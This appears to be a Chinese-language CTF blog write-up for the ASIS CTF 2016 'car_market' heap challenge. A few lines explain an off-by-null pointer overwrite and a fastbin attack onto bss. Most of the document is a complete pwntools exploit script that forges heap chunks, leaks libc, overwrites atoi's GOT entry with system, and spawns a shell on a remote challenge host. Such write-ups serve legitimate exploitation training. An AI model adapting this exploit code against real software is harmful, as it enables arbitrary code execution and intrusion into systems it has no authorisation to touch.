ha1vk's blog
0%

car_market_asis_ctf_2016

发表于 分类于

首先,检查一下程序的保护机制

然后,我们用IDA分析一下,程序功能比较多,这里不做分析了。

漏洞点在这,输入函数存在off by null。

该函数在set_customer_name里调用

可以将comment指针的低1字节覆盖

这样,我们只需要在对应的位置伪造好chunk,然后free掉形成overlap chunk即可控制,构造麻烦了点,为了能够通过fastbin attack申请到bss上控制堆指针,我们还需要利用count来伪造成chunk的size

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
#coding:utf8
from pwn import *

#sh = process('./car_market_asis_ctf_2016',env={'LD_PRELOAD':'./libc-2.23.so'})
sh = remote('node3.buuoj.cn',29774)
elf = ELF('./car_market_asis_ctf_2016')
libc = ELF('./libc-2.23.so')
atoi_got = elf.got['atoi']

def add_car(model,price):
   sh.sendlineafter('>','2')
   sh.sendlineafter('model',model)
   sh.sendlineafter('price',str(price))

def delete_car(index):
   sh.sendlineafter('>','3')
   sh.sendlineafter('index',str(index))

def show():
   sh.sendlineafter('>','1')

def select_car(index):
   sh.sendlineafter('>','4')
   sh.sendlineafter('index',str(index))

def add_customer():
   sh.sendlineafter('>','4')

def set_model(model):
   sh.sendlineafter('>','2')
   sh.sendafter('model',model)

def set_price(price):
   sh.sendlineafter('>','3')
   sh.sendlineafter('price',str(price))

def set_customer_name(name):
   sh.sendlineafter('>','1')
   sh.sendafter('name :',name)

def set_customer_comment(comment):
   sh.sendlineafter('>','3')
   sh.sendafter('coment :',comment)


add_car('a'*0x9,10) #0
select_car(0)
add_customer()
set_customer_comment('b'*0x40 + '\n')
sh.sendlineafter('>','4')
sh.sendlineafter('>','5')

#伪造一个chunk
add_car(p64(0) + p64(0x51),10) #1
select_car(1)
add_customer()
set_customer_comment('d'*0x40 + '\n')
#null off by one修改堆指针指向fake_chunk
set_customer_name(p64(0) + p64(0x21) + 'e'*0x10)
sh.sendlineafter('>','4')
sh.sendlineafter('>','5')

for i in range(0x51-2): #使得count增加为0x51,这样可以作为fake_chunk的size
   add_car('f'*0x9,10)

fake_chunk_in_bss = 0x00000000006020B8
#free掉fake_chunk
select_car(1)
add_customer()
sh.sendlineafter('>','4')
set_price(fake_chunk_in_bss) #将bss上的fake_chunk连接上去
sh.sendlineafter('>','5')


select_car(2)
add_customer()
#申请到bss上,控制堆指针数组,实现任意地址读写
fake_struct = p64(atoi_got-0x8) + p64(0) + p64(0) + '\n'
set_customer_comment(p64(0x00000000006020D0) + fake_struct)
sh.sendlineafter('>','4')
sh.sendlineafter('>','5')

select_car(0)
show()
sh.recvuntil('Model  : ')
libc_base = u64(sh.recv(6).ljust(8,'\x00')) - libc.sym['_IO_setvbuf']
system_addr = libc_base + libc.sym['system']
print 'libc_base=',hex(libc_base)
print 'system_addr=',hex(system_addr)
set_model(p64(0) + p64(system_addr)) #修改atoi的got表
#getshell
sh.sendlineafter('>','/bin/sh')


sh.interactive()